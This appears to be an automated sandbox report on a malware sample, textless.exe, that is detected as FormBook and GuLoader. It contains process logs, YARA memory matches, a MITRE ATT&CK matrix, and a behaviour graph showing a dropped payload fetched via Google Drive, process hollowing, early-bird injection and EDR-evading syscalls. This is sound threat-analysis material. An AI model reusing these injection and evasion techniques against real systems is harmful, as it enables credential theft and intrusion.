            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		OS Credential Dumping4
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Shared Modules            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		LSASS Memory124
            System Information Discovery            		Remote Desktop Protocol1
            Clipboard Data            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter            		Logon Script (Windows)1
            Access Token Manipulation            		3
            Obfuscated Files or Information            		Security Account Manager231
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            PowerShell            		Login Hook512
            Process Injection            		1
            Software Packing            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets41
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633447 Sample: textless.exe Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 42 drive.usercontent.google.com 2->42 44 drive.google.com 2->44 62 Multi AV Scanner detection for submitted file 2->62 64 Yara detected FormBook 2->64 66 Yara detected GuLoader 2->66 68 Joe Sandbox ML detected suspicious sample 2->68 11 textless.exe 1 39 2->11         started        14 svchost.exe 1 1 2->14         started        signatures3 process4 dnsIp5 40 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 11->40 dropped 17 powershell.exe 30 11->17         started        50 127.0.0.1 unknown unknown 14->50 file6 process7 file8 36 C:\Users\user\AppData\...\Versificator.exe, PE32 17->36 dropped 38 C:\Users\...\Versificator.exe:Zone.Identifier, ASCII 17->38 dropped 54 Early bird code injection technique detected 17->54 56 Writes to foreign memory regions 17->56 58 Sample uses process hollowing technique 17->58 60 4 other signatures 17->60 21 Versificator.exe 6 17->21         started        25 conhost.exe 17->25         started        signatures9 process10 dnsIp11 46 drive.usercontent.google.com 142.250.185.97, 443, 49693 GOOGLEUS United States 21->46 48 drive.google.com 216.58.212.142, 443, 49692 GOOGLEUS United States 21->48 70 Multi AV Scanner detection for dropped file 21->70 72 Maps a DLL or memory area into another process 21->72 74 Switches to a custom stack to bypass stack traces 21->74 27 0ogHncCUa.exe 21->27 injected signatures12 process13 signatures14 76 Found direct / indirect Syscall (likely to bypass EDR) 27->76 30 logman.exe 27->30         started        process15 signatures16 78 Maps a DLL or memory area into another process 30->78 33 0ogHncCUa.exe 30->33 injected process17 signatures18 52 Found direct / indirect Syscall (likely to bypass EDR) 33->52

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            textless.exe31%VirustotalBrowse
            textless.exe24%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Versificator.exe24%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		216.58.212.142
            		truefalse
              		high
              drive.usercontent.google.com
              		142.250.185.97
              		truefalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.microsoftpowershell.exe, 00000001.00000002.1494796227.000000000098A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000004.00000003.1203307470.0000025524E00000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.ver)svchost.exe, 00000004.00000002.2121276429.0000025525000000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.ftp.ftp://ftp.gopher.Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://drive.usercontent.google.com/Versificator.exe, 0000000B.00000002.2011875250.00000000056F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrortextless.exe, 00000000.00000000.876802656.0000000000409000.00000008.00000001.01000000.00000003.sdmp, textless.exe, 00000000.00000002.925012774.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Versificator.exe, 0000000B.00000000.1493934268.0000000000409000.00000008.00000001.01000000.0000000B.sdmpfalse
                                        		high
                                        https://drive.google.com/HVersificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
